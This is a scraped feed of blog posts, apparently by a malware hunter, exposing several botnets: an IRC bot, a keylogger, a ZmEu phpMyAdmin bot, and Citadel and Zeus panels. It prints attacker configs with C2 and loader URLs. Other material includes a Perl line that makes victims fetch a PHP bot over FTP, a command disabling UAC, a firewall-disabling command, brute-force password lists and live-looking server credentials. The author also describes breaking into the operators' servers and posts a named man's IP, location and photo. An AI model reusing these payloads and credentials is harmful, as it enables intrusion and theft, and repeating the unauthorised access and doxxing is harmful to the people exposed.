// bot commands </code><code style="color: black; word-wrap: normal;">commands: botinfo/rarworm/xpl/p2p/vncstop/disconnect/reconnect/nick/restart/part/join/
// host auth md5 crypted </code><code style="color: black; word-wrap: normal;">630e20d41ee020459be07f5e8b7810dc : root.edu
// delete and download command md5 crypted</code><code style="color: black; word-wrap: normal;">099af53f601532dbd31e0ea99ffdeb64 - delete</code><code style="color: black; word-wrap: normal;">fd456406745d816a45cae554c788e754 - download
// VNC brutefore used paswswords </code><code style="color: black; word-wrap: normal;">password
11111111
12345678
1234567
123456
</code></pre>
<span style="font-size: x-small;"><br /></span>
<span style="font-size: x-small;">Plain bin and a report serach malwr for : <b>81062eeec1984689b90fc38dc1bfcc6b</b></span>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-68291437538051473882015-01-24T03:03:00.003-08:002015-01-24T03:03:59.453-08:00Keylogger - 77.221.130.21 <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHjwi10OHB0vSIZr58RFbS4AlU2H8Fj_n3NPMhJm8NFenlvKrf7GgLSFxZNMYkVUJykaBLbyiqV7DQEbkETYv2So09L_9jph4ADsEjPK-Y-Fs9TLDpUnWXdd-ZroCxPxkB_5FmKylW1vw/s1600/asaaaa.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhHjwi10OHB0vSIZr58RFbS4AlU2H8Fj_n3NPMhJm8NFenlvKrf7GgLSFxZNMYkVUJykaBLbyiqV7DQEbkETYv2So09L_9jph4ADsEjPK-Y-Fs9TLDpUnWXdd-ZroCxPxkB_5FmKylW1vw/s320/asaaaa.png" /></a><br />
<br />
<span style="font-size: small;">Creates reports for ( processes , logged key, and url's ) and save's em into here : </span><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">Server : </code>77.221.130.21 Port : 21
USER z92681.
PASS MzG5k6N2n..
OPTS utf8 on..
PWD..CWD /lo/..
// user and pass
0K9dg2kQEl+THDzDsftcRA==
1.0.0.0
127.0.0.1
3drRPuLbQmixloQTAAYA1g==
// start up
.exe /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f
// Sample and a Malwr report serach : 3b56c66455c3b1a82bcd56da18df9c38</pre>
<br />bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-7093653482175733192015-01-14T16:17:00.000-08:002015-01-14T16:17:05.517-08:0022k ZmEu Botnet <span style="font-family: Verdana, sans-serif; font-size: small;">On my Honeypot found this connection , i was and IRC serv running on that server</span><br />
<br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4E0C9bg6lq3hzcunphNrVRw7zmBbLHEEUWF9s_KfuIfhKUNLsUKfL1nBkQ1Orgrcffs_DFk_kvJq1jbXNtuCM9-gffnHOGPGXxDE6zbRNQyNaEP6U-nZuBIjaOh0IbL7Z1om8EfJVMW4/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg4E0C9bg6lq3hzcunphNrVRw7zmBbLHEEUWF9s_KfuIfhKUNLsUKfL1nBkQ1Orgrcffs_DFk_kvJq1jbXNtuCM9-gffnHOGPGXxDE6zbRNQyNaEP6U-nZuBIjaOh0IbL7Z1om8EfJVMW4/s320/1.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">Connting to that oort ... </span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcbEVlnCoP-4U6bUv9CqBnKa9LKfP-uHMJ7kgvOHyJeuOW1PkGJqv87h7ddxIV_7Z4oMclvAJlPAbcrcC6VIuZGslUvNuXmarY56NuBy1LAiRHB-yhOJ1RDstRVqlz2TrLiODnW7-eCtE/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjcbEVlnCoP-4U6bUv9CqBnKa9LKfP-uHMJ7kgvOHyJeuOW1PkGJqv87h7ddxIV_7Z4oMclvAJlPAbcrcC6VIuZGslUvNuXmarY56NuBy1LAiRHB-yhOJ1RDstRVqlz2TrLiODnW7-eCtE/s320/2.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">-Lets check security of his server !! oh </span><br />
<span style="font-size: small;"><br />
</span> <span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJY20R3QXbZyQ16fnfkYlvgeHxcGTkvQe9Q51wQfrsc4VkyJB-iU6pgNrM0JCzErhu14L_rWO8fJznF0z0j_R8kXOKTH61K83x7KE3jRsM4d_gq-aE8M0Wu7ve9Jv-4xYuhUqWiqVBTQo/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjJY20R3QXbZyQ16fnfkYlvgeHxcGTkvQe9Q51wQfrsc4VkyJB-iU6pgNrM0JCzErhu14L_rWO8fJznF0z0j_R8kXOKTH61K83x7KE3jRsM4d_gq-aE8M0Wu7ve9Jv-4xYuhUqWiqVBTQo/s320/4.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">Also many connections on that port which IRC serv is running</span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvd6LNUGzTf8m15JjtP3S5vkzEoTteZvSITkqBqdHwV2flttP2pPBmqvoiTcn_rEDu7QROMR49wJjo2D1N0J3J43hnRArbkPcCG5r_VOUdGjVvZGb6UzGbrvhsCRJ4UEzh10OAhGLP5ZM/s1600/5.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgvd6LNUGzTf8m15JjtP3S5vkzEoTteZvSITkqBqdHwV2flttP2pPBmqvoiTcn_rEDu7QROMR49wJjo2D1N0J3J43hnRArbkPcCG5r_VOUdGjVvZGb6UzGbrvhsCRJ4UEzh10OAhGLP5ZM/s320/5.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">Got his config and lets join irc ..</span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaq1guneQj1uk6IwxDcFuL2vHP5ZYtsMVgU6PAW3Jj-Y6JJ_So__nKQbLJhEwtUgLNQViH1TskPQAPHKoAxzXn7ThO75fgxEnY-li8xXLxZmWpxhSFga9MmjAR8rxr5oHZFvdGvTicU48/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgaq1guneQj1uk6IwxDcFuL2vHP5ZYtsMVgU6PAW3Jj-Y6JJ_So__nKQbLJhEwtUgLNQViH1TskPQAPHKoAxzXn7ThO75fgxEnY-li8xXLxZmWpxhSFga9MmjAR8rxr5oHZFvdGvTicU48/s320/3.png" /></a></span><br />
<span style="font-size: small;"><br />
</span> <span style="font-family: Verdana, sans-serif; font-size: small;">Many bots! 26k</span><br />
<span style="font-size: small;"><br />
</span> <span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi21gf23wP753vpZ9jfyTlA7RnPPIQOq776vPzw05B6KtuRpbxUYW0idSjl7jS6BZV_yB79c3D14sAlUXFdJL1RnM44Sa5kykT8LaT9-fk8hodjwKTHQ_CwbKJ3cWhy2vLiizJDFUNVJr4/s1600/7.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEi21gf23wP753vpZ9jfyTlA7RnPPIQOq776vPzw05B6KtuRpbxUYW0idSjl7jS6BZV_yB79c3D14sAlUXFdJL1RnM44Sa5kykT8LaT9-fk8hodjwKTHQ_CwbKJ3cWhy2vLiizJDFUNVJr4/s320/7.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">/list</span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2CLPl1Zg-V-zhM7tjwxAcCu0rizcvjsse9HyJFZdfB581XDj891zXVWB-R5dxfCKWs5XY9SVDB533ZQU2GCnx9rMArbHX-eHuZVSlD1u2OHO7KTAoY2wF60BRFmN7gwlNNbebPuP-LaQ/s1600/9.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2CLPl1Zg-V-zhM7tjwxAcCu0rizcvjsse9HyJFZdfB581XDj891zXVWB-R5dxfCKWs5XY9SVDB533ZQU2GCnx9rMArbHX-eHuZVSlD1u2OHO7KTAoY2wF60BRFmN7gwlNNbebPuP-LaQ/s320/9.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">2 admin's IP addresses </span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqKqEb4H8E-v2MBJNH1eixs1zNFqGkuAj3TMvBqjHFhjwfyBDzWCv9iGIljCg2ZDP0JdCslR9O-PrHTF7rzQbeOnQDsMgOWObYmgzX2xwWel6CNas5OUnmT7ct5azj-9i4JItAw3TKEXM/s1600/10.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhqKqEb4H8E-v2MBJNH1eixs1zNFqGkuAj3TMvBqjHFhjwfyBDzWCv9iGIljCg2ZDP0JdCslR9O-PrHTF7rzQbeOnQDsMgOWObYmgzX2xwWel6CNas5OUnmT7ct5azj-9i4JItAw3TKEXM/s320/10.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">Now i checked some log's of the infected pc's and found thiss ...</span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDa5nAwEsz5qxRF9j3iDCAhZ8IBzgYzbgMiC-pio5OnZZ5FlZ-X2fMQSG949C29f2dy_e6Zx_As6BhCTp_qe3dPVhQAmi4qd2-clcMsd0i964YFphWcIwSAR_rPK90wV7YqjruOuCpfZQ/s1600/x1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgDa5nAwEsz5qxRF9j3iDCAhZ8IBzgYzbgMiC-pio5OnZZ5FlZ-X2fMQSG949C29f2dy_e6Zx_As6BhCTp_qe3dPVhQAmi4qd2-clcMsd0i964YFphWcIwSAR_rPK90wV7YqjruOuCpfZQ/s320/x1.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">also he is spreading over a script that seraches for weak or no pass mysql php panel's</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">and infect them also /panel/script/setup.php this is an tool which HF skidds uses</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">its called the ZmEu masscan later more on that .</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">Also 14.35.234.212 was his scanning / spreading server</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">let's see if that better secured ... lolz </span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkqjarKbHmEJLmpfaNP3iJLzQ59MpcLiG5C6C38z_k7Z1u38ACmSoItZPceUVlC69pe7SyxRm6HQ7wB4HoJn06WbtOk2WCbWMb7boyz6wswb70p0lRavV9-K7GYWlQ5KFwPxKoyaABes/s1600/x2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgAkqjarKbHmEJLmpfaNP3iJLzQ59MpcLiG5C6C38z_k7Z1u38ACmSoItZPceUVlC69pe7SyxRm6HQ7wB4HoJn06WbtOk2WCbWMb7boyz6wswb70p0lRavV9-K7GYWlQ5KFwPxKoyaABes/s320/x2.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;"> you see its an perl script that attacks filtered ip addresses that have</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">phpmyadmin panel online or vulnarable | ps aux </span><span style="font-family: Verdana, sans-serif; font-size: small;"> </span><br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs673bfmD27v5UPmRyQGyEc6d7HdWemkeCy05ajTdycBFlbQIFFroIGqVl9qwAHInQX3ieU6Mx5Q7L4ItZigMukEnLvfeAEQeq6_Qv70XNUmp0xb4-3Ctuzh6zIuPL4zgJYr_z_UsAaYk/s1600/x3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgs673bfmD27v5UPmRyQGyEc6d7HdWemkeCy05ajTdycBFlbQIFFroIGqVl9qwAHInQX3ieU6Mx5Q7L4ItZigMukEnLvfeAEQeq6_Qv70XNUmp0xb4-3Ctuzh6zIuPL4zgJYr_z_UsAaYk/s320/x3.png" /></a></span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;"> so located his script /bin/.php/</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">i attach later a archive whith all his data</span><br />
<span style="font-family: Verdana, sans-serif; font-size: small;">see all *.txt files are vuln phpmyadmin panel that can maybe exploited</span><br />
<br />
<span style="font-size: small;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqxGcARZS5GxyYeFl3iOooX7x8gR5ZWzFZmukrSMBdaS_cF-3dfdVT8pEat6hno2kwwacXX5M5isqq-RREtzq8UELU5h31SyrEbJcN9RDAcqH_opZxLf-APie0b3s_MmU_7OJ-wgm8WPo/s1600/x4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjqxGcARZS5GxyYeFl3iOooX7x8gR5ZWzFZmukrSMBdaS_cF-3dfdVT8pEat6hno2kwwacXX5M5isqq-RREtzq8UELU5h31SyrEbJcN9RDAcqH_opZxLf-APie0b3s_MmU_7OJ-wgm8WPo/s320/x4.png" /></a></span><br />
<pre style="background: none repeat scroll 0% 0% rgb(240, 240, 240); border: 1px dashed rgb(204, 204, 204); color: black; font-family: arial; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><span style="font-size: small;"><code style="color: black; word-wrap: normal;">cat all.pl
http://pastebin.com/JZnMHGGE
i paste just this here
my $url = $host;
my $ftp = "ftp://185.4.29.127/a/0.php";
my $len = length($ftp);
every exploited pc , is forced to download this file over ftp
cat 0.php
http://pastebin.com/g75MAgjz
its a php bot
"server" => "222.216.30.28",
"port" => "3131",
"key" => "*",
"prefix" => "",
"maxrand" => "8",
"chan" => "#dd0s#",
"trigger" => ".",
"hostauth" => "root.edu"
there are some other file's
cat a.php
http://pastebin.com/CKs5fRkv
cat ax.php
http://pastebin.com/GC3dcuyz
cat win.php
http://pastebin.com/3Np2JsYw
</code></span></pre>
<span style="font-family: Verdana, sans-serif; font-size: small;">-All data will be attached soon as archive .. <br />More about pma bot <a href="http://blog.malwaremustdie.org/2013/10/a-disclosure-of-whats-behind-w00tw00t.html" target="_blank">Here</a></span>bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-40387018339348725132015-01-04T14:23:00.002-08:002015-01-04T14:23:44.645-08:00Citadel - cynthialemos1225.ddns.net ( Richy Adams ) - Exposed <div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWyo0EiL8_ZMyk2muc9rko0Tb65uaExTG76QkystLF3NaoqeDsen5ZpBQ4hrQ3jjSoULE3GnEyE1NP6A_ZXVHsGyCTZNvJRWr6Ra8dPo69CgKhla-qrhXZY4xnKkycHTbs_bCiW637Ejs/s1600/1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhWyo0EiL8_ZMyk2muc9rko0Tb65uaExTG76QkystLF3NaoqeDsen5ZpBQ4hrQ3jjSoULE3GnEyE1NP6A_ZXVHsGyCTZNvJRWr6Ra8dPo69CgKhla-qrhXZY4xnKkycHTbs_bCiW637Ejs/s1600/1.png" height="234" width="320" /></a></div>
<br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">// config.php
$config = array (
'mysql_host' => 'localhost',
'mysql_user' => 'root',
'mysql_pass' => 'qwerty23456@',
'mysql_db' => 'tenna',
'reports_path' => '_reports1190699691',
'reports_to_db' => 1,
'reports_to_fs' => 0,
'reports_geoip' => 0,
'jabber' =>
array (
'host' => '',
'login' => '',
'pass' => '',
'port' => 5222,
),
'reports_jn' => 0,
'reports_jn_logfile' => '_reports1190699691/jabber.log',
......
),
'allowed_countries_enabled' => 0,
'allowed_countries' => '',
'botnet_timeout' => 1500,
'botnet_cryptkey' => 'sgasgdsgdshwgrekhgjlksdng',
);
$config['botnet_cryptkey_bin'] = array(200, 56, 101, 2, 42, 30, 79, 114, 114, 231, 90, 185, 178, 234, 43, 113, 77, 215, 74, 251, 72, 147, 112, 209, 143, 3, 221, 34, 213, 155, 59, 1, 102, 95, 251, 64, 4, 6, 37, 10, 88, 115, 111, 203, 37, 251, 237, 91, 59, 186, 76, 153, 210, 127, 255, 187, 176, 187, 202, 17, 228, 83, 73, 72, 124, 73, 129, 105, 86, 226, 91, 206, 125, 149, 142, 159, 128, 61, 189, 143, 202, 109, 63, 124, 118, 48, 176, 36, 177, 181, 123, 0, 242, 220, 30, 100, 232, 246, 146, 150, 224, 233, 252, 198, 250, 44, 26, 146, 38, 153, 1, 249, 208, 171, 247, 133, 20, 117, 173, 227, 152, 170, 248, 62, 39, 119, 169, 200, 110, 65, 11, 164, 164, 19, 183, 7, 133, 13, 238, 205, 87, 28, 86, 60, 67, 222, 16, 128, 64, 138, 200, 81, 75, 12, 62, 240, 23, 168, 201, 190, 47, 180, 95, 214, 218, 206, 128, 162, 169, 78, 44, 174, 116, 45, 161, 245, 27, 142, 18, 86, 92, 195, 155, 78, 248, 150, 58, 54, 14, 174, 88, 211, 197, 35, 19, 142, 10, 99, 5, 33, 137, 161, 65, 175, 51, 91, 107, 201, 193, 40, 150, 218, 105, 129, 115, 168, 41, 57, 244, 108, 29, 130, 231, 141, 236, 214, 182, 177, 9, 21, 229, 57, 90, 100, 140, 106, 93, 217, 213, 158, 221, 17, 38, 98, 165, 123, 199, 76, 223, 239, 154, 110, 16, 229, 190, 4);
return $config;
</code>
</pre>
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">config.txt / from builder
entry "StaticConfig"
botnet "CIT"
timer_config 4 9
timer_logs 3 6
timer_stats 4 8
timer_modules 1 4
timer_autoupdate 8
url_config1 "http://richyadams.zapto.org/xampp/link/config.bin"
remove_certs 1
; disable_tcpserver 0
disable_cookies 0
encryption_key "jzhbfgjdhbgjhddkjgskdj"
report_software 1
enable_luhn10_get 0
enable_luhn10_post 1
disable_antivirus 0
use_module_video 1
antiemulation_enable 0
disable_httpgrabber 0
use_module_ffcookie 1
end
entry "DynamicConfig"
url_loader "http://richyadams.zapto.org/xampp/link/soft.exe"
url_server "http://richyadams.zapto.org/xampp/link/gate.php"
file_webinjects "injects.txt"
url_webinjects "http://richyadams.zapto.org/xampp/link/file.php"
entry "AdvancedConfigs"
"http://richyadams.zapto.org/xampp/link/config.bin"
"http://richyadams.zapto.org/xampp/link/config.bin"
end
entry "WebFilters"
"#*wellsfargo.com/*"
"@*payment.com/*"
"!http://*.com/*.jpg"
end
entry HttpVipUrls
"*facebook.com/*"
end
entry "WebDataFilters"
end
entry "WebFakes"
end
entry "CmdList"
"hostname"
"tasklist"
"ipconfig /all"
"netsh firewall set opmode disable"
end
entry "Keylogger"
processes "bank.exe;java.exe"
time 3
end
entry "Video"
quality 1
length 600
end
end
</code></pre>
<br />
<span style="font-family: "Courier New",Courier,monospace;"><span style="font-size: small;">Not many bots Richy ..</span></span><br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA6IU7d9cBTkWkdLvHfIyhTvlKE4ot9f1g6NYHFsm8Kvow52OltZgZJhWd1b48HQ9s-u3zniiOQrXvO9ApVhifv7x0ONQ5x-b6iiZeFhJNKsdOuXJRFc8TUCE-6VfqPSqjE2zPEOAPkSM/s1600/2.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjA6IU7d9cBTkWkdLvHfIyhTvlKE4ot9f1g6NYHFsm8Kvow52OltZgZJhWd1b48HQ9s-u3zniiOQrXvO9ApVhifv7x0ONQ5x-b6iiZeFhJNKsdOuXJRFc8TUCE-6VfqPSqjE2zPEOAPkSM/s1600/2.png" height="234" width="320" /></a></div>
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;"> // Here is the admin ip address !
</code>41.138.188.121 - - [02/Jan/2015:21:46:00 +0100] "GET /xampp/link/cp.php?m=home HTTP/1.1" 200 224893 "http://cynthialemos1225.ddns.net/xampp/link/cp.php?m=home" "Mozilla/5.0 (Windows NT 6.1; rv:34.0) Gecko/20100101 Firefox/34.0"
</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUDDmXrP893HF4ufP9l5-7vSr_kQnN7BPMhGkHh1NBa2SkDxHJizyIIdUMpO_yJsdSDL9fIQ036sT_Cd5Dhx9elRDKIT9v5XdZYavB2W-JvQ-_3sKbVlS6oYHbttliJmyUMFA00F3-LPc/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiUDDmXrP893HF4ufP9l5-7vSr_kQnN7BPMhGkHh1NBa2SkDxHJizyIIdUMpO_yJsdSDL9fIQ036sT_Cd5Dhx9elRDKIT9v5XdZYavB2W-JvQ-_3sKbVlS6oYHbttliJmyUMFA00F3-LPc/s1600/3.png" height="173" width="320" /></a><br />
<br />
He's location based on the ip <br />
and here is a pic of him<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj27q14gavU9ZUwn3jY9tlWaTVKQ6aVyqHxjr8dSFJGn_iZZNYZgrW0ZhewAUlijeiyu4JxX1eGLh7VBziUivhgpY-Hff4HmiqMn7J79wQ9H4diT5DjNtx7CS7UnLo_n4yGDYEfnCxovcM/s1600/4.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj27q14gavU9ZUwn3jY9tlWaTVKQ6aVyqHxjr8dSFJGn_iZZNYZgrW0ZhewAUlijeiyu4JxX1eGLh7VBziUivhgpY-Hff4HmiqMn7J79wQ9H4diT5DjNtx7CS7UnLo_n4yGDYEfnCxovcM/s320/4.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS3MmPFT7E36hU-_ZyhEpV61YNUs6QsYyY7_9uDMgx8YgjLfJHRyjiggldwD34WJQljB24uOUuZAu3s3TXQbF42LvaU2zB65zpwN1V1TyqsndQHNh2jRjHRYJTvpKohkycu__ucb8iuAY/s1600/5.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjS3MmPFT7E36hU-_ZyhEpV61YNUs6QsYyY7_9uDMgx8YgjLfJHRyjiggldwD34WJQljB24uOUuZAu3s3TXQbF42LvaU2zB65zpwN1V1TyqsndQHNh2jRjHRYJTvpKohkycu__ucb8iuAY/s320/5.png" /></a><br />
luv ur pix too !!bi0http://www.blogger.com/profile/14620421761593085083noreply@blogger.com0tag:blogger.com,1999:blog-2580748854525661454.post-54227836638079530072014-12-06T12:09:00.001-08:002014-12-06T12:09:36.348-08:00Zeus Botnet - 54.201.153.149 - Owned<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKO18LnuerehkEN_0O1PK9mWHfjcgJvzfKuo62mEQClz66f4GQIKdYl3mFiwh5z46vjZZ5iEMKvZbKxJ7_8fbqTzy6qWOz2NJ2Y6XIRxK4TTyjYDbS66QRYdyfw4jLGKZeG6rqiGM046U/s1600/2.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgKO18LnuerehkEN_0O1PK9mWHfjcgJvzfKuo62mEQClz66f4GQIKdYl3mFiwh5z46vjZZ5iEMKvZbKxJ7_8fbqTzy6qWOz2NJ2Y6XIRxK4TTyjYDbS66QRYdyfw4jLGKZeG6rqiGM046U/s320/2.png" /></a><br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxShqYOWuQaXU0k0u3UmE0fchbzLaQntm6QC68x9QrD_HSjZADAEmC5RKJ-QEItoGaHaWccqSBiNqSKsuCGue4j2SxvgHlBLJIDOBZ3b1mmnEgJ3BxeD2ZyNegFAULmAtpnWfY6HhhFK4/s1600/1.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgxShqYOWuQaXU0k0u3UmE0fchbzLaQntm6QC68x9QrD_HSjZADAEmC5RKJ-QEItoGaHaWccqSBiNqSKsuCGue4j2SxvgHlBLJIDOBZ3b1mmnEgJ3BxeD2ZyNegFAULmAtpnWfY6HhhFK4/s320/1.png" /></a><br />
<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLgRnkVMiRBZ0lo3wmMjyW1wNUR8OGrJ8gZlZRmDYL4JQc9s1m74-mJACYSbuoylgxs7FDc3Zky_vLjAZ4ZhOwzVLZyoqf6ALo5ZNMuWIVl3bdwOHm0GuMAf_6WpRvp48DEp0OKAJFMtQ/s1600/3.png" imageanchor="1"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLgRnkVMiRBZ0lo3wmMjyW1wNUR8OGrJ8gZlZRmDYL4JQc9s1m74-mJACYSbuoylgxs7FDc3Zky_vLjAZ4ZhOwzVLZyoqf6ALo5ZNMuWIVl3bdwOHm0GuMAf_6WpRvp48DEp0OKAJFMtQ/s320/3.png" /></a><br />
<br />
<pre style="background: #f0f0f0; border: 1px dashed #CCCCCC; color: black; font-family: arial; font-size: 12px; height: auto; line-height: 20px; overflow: auto; padding: 0px; text-align: left; width: 99%;"><code style="color: black; word-wrap: normal;">
// version 2.0.8.9
// admin user
admin : mentman1
// ftp :
deamon:xampp
// config
#?php
$config['mysql_host'] = '127.0.0.1';
$config['mysql_user'] = 'daemon';
$config['mysql_pass'] = 'jG9mBvGQM7Jhbv62';
$config['mysql_db'] = 'evildb';
$config['reports_path'] = '_feedback';
$config['reports_to_db'] = 1;
$config['reports_to_fs'] = 1;
$config['reports_no_shit'] = 1;
$config['reports_jn'] = 0;
$config['reports_jn_logfile'] = '';
$config['reports_jn_account'] = '';
$config['reports_jn_pass'] = '';
$config['reports_jn_server'] = '';
$config['reports_jn_port'] = 5222;
$config['reports_jn_to'] = '';
$config['reports_jn_list'] = '';
$config['reports_jn_script'] = '';
$config['reports_dyncfg'] = 0;
$config['reports_dyncfg_script'] = '';
$config['membership_timeout'] = 1500;
$config['membership_cryptkey'] = 'ovWPvhfFJ';
$config['membership_cryptkey_bin'] = array(111, 27, 63, 146, 46, 219, 229, 29, 132, 252, 195, 222, 120, 85, 235, 8, 237, 173, 210, 215, 196, 14, 183, 54, 105, 33, 119, 230, 86, 101, 117, 93, 3, 131, 112, 197, 36, 147, 74, 89, 212, 64, 21, 207, 15, 60, 224, 30, 1, 141, 250, 32, 94, 194, 90, 72, 77, 214, 134, 165, 0, 126, 199, 115, 255, 193, 245, 52, 118, 99, 48, 49, 187, 104, 159, 163, 244, 148, 190, 221, 26, 247, 191, 88, 103, 62, 133, 70, 108, 208, 216, 82, 114, 124, 243, 186, 71, 100, 211, 169, 246, 138, 10, 57, 16, 180, 200, 125, 202, 150, 236, 130, 129, 149, 189, 22, 168, 201, 80, 184, 67, 233, 106, 172, 84, 177, 158, 28, 151, 209, 182, 161, 154, 171, 102, 227, 248, 40, 92, 58, 152, 95, 142, 68, 156, 97, 17, 20, 254, 251, 13, 107, 223, 56, 160, 50, 228, 51, 79, 66, 9, 91, 75, 232, 239, 2, 83, 144, 45, 35, 166, 37, 181, 240, 6, 65, 185, 253, 5, 18, 25, 145, 188, 137, 192, 127, 128, 98, 19, 155, 34, 38, 178, 213, 136, 31, 198, 140, 205, 123, 206, 231, 226, 55, 238, 87, 203, 24, 109, 122, 69, 110, 157, 59, 242, 42, 81, 135, 218, 121, 170, 41, 76, 179, 12, 139, 96, 204, 241, 11, 164, 53, 249, 44, 23, 43, 78, 113, 217, 220, 234, 116, 4, 7, 73, 176, 175, 174, 225, 143, 47, 39, 167, 153, 162, 61);
?#
// extracted by Xylitol
